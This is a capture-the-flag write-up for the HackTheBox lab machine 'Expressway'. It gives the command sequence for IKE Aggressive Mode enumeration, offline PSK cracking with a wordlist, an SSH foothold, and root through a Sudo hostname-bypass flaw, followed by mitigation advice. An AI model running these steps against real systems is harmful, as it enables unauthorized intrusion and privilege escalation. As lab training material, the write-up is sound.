Expressway HTB Writeup | HacktheBox | Season 9
Expressway HTB Writeup | HacktheBox | Season 9
1. Recon
Start with a fast TCP and UDP sweep to find services.
nmap -sS -sU -T4 -p- --min-rate 1000 expressway.htb -oA scans/expressway/full nmap -sC -sV -p22,500 expressway.htb -oA scans/expressway/services
Result: SSH on 22/tcp and an IKE/ISAKMP responder on 500/udp.
2. IKE enumeration (Aggressive Mode)
Because UDP/500 was open, probe the service with ike-scan. Aggressive Mode often returns identity strings and data useful for offline PSK cracking.
# Main Mode ike-scan -M expressway.htb # Aggressive Mode (more verbose / leak-prone) ike-scan -A expressway.htb > ike-agg.txt
Aggressive Mode returned an identity of [email protected] and produced an output I saved for cracking.
3. Capture → Crack PSK
Save the Aggressive Mode output and run it through your PSK cracking workflow (tooling varies — some tools accept raw ike-scan output; others want pcap conversions).
# output from ike-scan already saved to ike-agg.txt # feed ike-agg.txt into your preferred PSK-cracking tool with a wordlist psk-crack-tool -i ike-agg.txt -w /usr/share/wordlists/rockyou.txt -o cracked.txt # cracked.txt -> PSK: [REDACTED-PSK]
Important: The PSK recovered in the lab is redacted here as [REDACTED-PSK]. Never publish real shared secrets
4. SSH foothold as ike
With the PSK-derived credentials (or the VPN-authenticated session), authenticate to the host and obtain an interactive shell.
ssh [email protected] # (authentication method/cleartext password omitted for safety)
Once on the box:
id hostname ls -la /home/ike cat /home/ike/user.txt # user flag
user.txt was present in /home/ike.
5. Local enumeration
Standard enumeration gave the clues needed for escalation:
uname -a cat /etc/os-release sudo -V # shows Sudo 1.9.17 ps aux find / -perm -4000 -type f 2>/dev/null grep -R "offramp" /var/log 2>/dev/null || true
Important find: logs contained the hostname offramp.expressway.htb, which became useful for the Sudo bypass.
6. Privilege escalation — Sudo hostname bypass (CVE-2025-32462)
Sudo 1.9.17 is vulnerable to a hostname-bypass edge condition. Using the hostname discovered in logs, the bypass was exercised to escalate to root.
Conceptual (non-weaponized) demonstration:
# confirm sudo version sudo -V # attempt host-bypass style invocation (lab PoC) # NOTE: real PoC code is not pasted here to avoid unsafe distribution /usr/local/bin/sudo -h offramp.expressway.htb -i # -> root shell in the lab
After gaining a root shell:
cat /root/root.txt # root flag
An alternate local exploit (CVE-2025-32463) was also tested and worked as a fallback.
7. Post-exploit notes
user.txt found at /home/ike
root.txt found at /root
All sensitive outputs and credentials have been redacted in this public writeup.
Mitigations & recommendations
- Replace PSKs with certificate-based IKE authentication, or use long, random PSKs rotated regularly.
- Disable Aggressive Mode in IKE where not required — it exposes identifying data that eases offline attacks.
- Patch Sudo to the vendor-fixed versions that address CVE-2025-32462 / CVE-2025-32463.
- Treat logs as sensitive — avoid leaking internal hostnames and identifiers into world-readable logs.
- Network segmentation & filtering: restrict UDP/500 to trusted peers and monitor unusual IKE attempts.
- Harden SSH: limit access, use key-based auth + MFA, and log/alert on anomalous logins.
Access is restricted by HackTheBox rules#
The solution to the problem can be published in the public domain after her retirement.
Look for a non-public solution to the problem in the telegram channel .
